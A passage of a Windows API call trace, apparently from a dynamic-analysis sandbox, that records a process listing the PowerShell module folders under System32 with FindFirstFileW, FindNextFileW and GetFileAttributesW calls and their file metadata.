| out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 1 [0227.933] FindNextFileW (in: hFindFile=0x25b73cd1ef0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19a4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive.psm1", cAlternateFileName="")) returned 0 [0227.933] FindClose (in: hFindFile=0x25b73cd1ef0 | out: hFindFile=0x25b73cd1ef0) returned 1 [0227.933] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1")) returned 0x20 [0227.933] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1b90 [0227.933] FindNextFileW (in: hFindFile=0x25b73cd1b90, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.934] FindNextFileW (in: hFindFile=0x25b73cd1b90, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0227.934] FindNextFileW (in: hFindFile=0x25b73cd1b90, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0227.935] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1590 [0227.935] FindNextFileW (in: hFindFile=0x25b73cd1590, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.935] FindNextFileW (in: hFindFile=0x25b73cd1590, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0227.935] FindNextFileW (in: hFindFile=0x25b73cd1590, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.936] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd23d0 [0227.937] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.937] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 1 [0227.937] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics.psd1", cAlternateFileName="")) returned 0 [0227.937] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0e70 [0227.938] FindNextFileW (in: hFindFile=0x25b73cd0e70, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.938] FindNextFileW (in: hFindFile=0x25b73cd0e70, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0227.938] FindNextFileW (in: hFindFile=0x25b73cd0e70, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0227.938] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd0d50 [0227.938] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.938] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0227.939] FindNextFileW (in: hFindFile=0x25b73cd0d50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.939] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd13b0 [0227.939] FindNextFileW (in: hFindFile=0x25b73cd13b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.939] FindNextFileW (in: hFindFile=0x25b73cd13b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 1 [0227.939] FindNextFileW (in: hFindFile=0x25b73cd13b0, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host.psd1", cAlternateFileName="")) returned 0 [0227.939] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1350 [0227.940] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.940] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0227.940] FindNextFileW (in: hFindFile=0x25b73cd1350, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0227.940] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1f50 [0227.940] FindNextFileW (in: hFindFile=0x25b73cd1f50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.941] FindNextFileW (in: hFindFile=0x25b73cd1f50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0227.941] FindNextFileW (in: hFindFile=0x25b73cd1f50, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.941] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd1a70 [0227.941] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa33a1b4, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa33a1b4, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.941] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0227.941] FindNextFileW (in: hFindFile=0x25b73cd1a70, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0227.942] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0227.942] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2250 [0227.942] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.942] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.942] FindNextFileW (in: hFindFile=0x25b73cd2250, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x29c8e, dwReserved0=0x0, 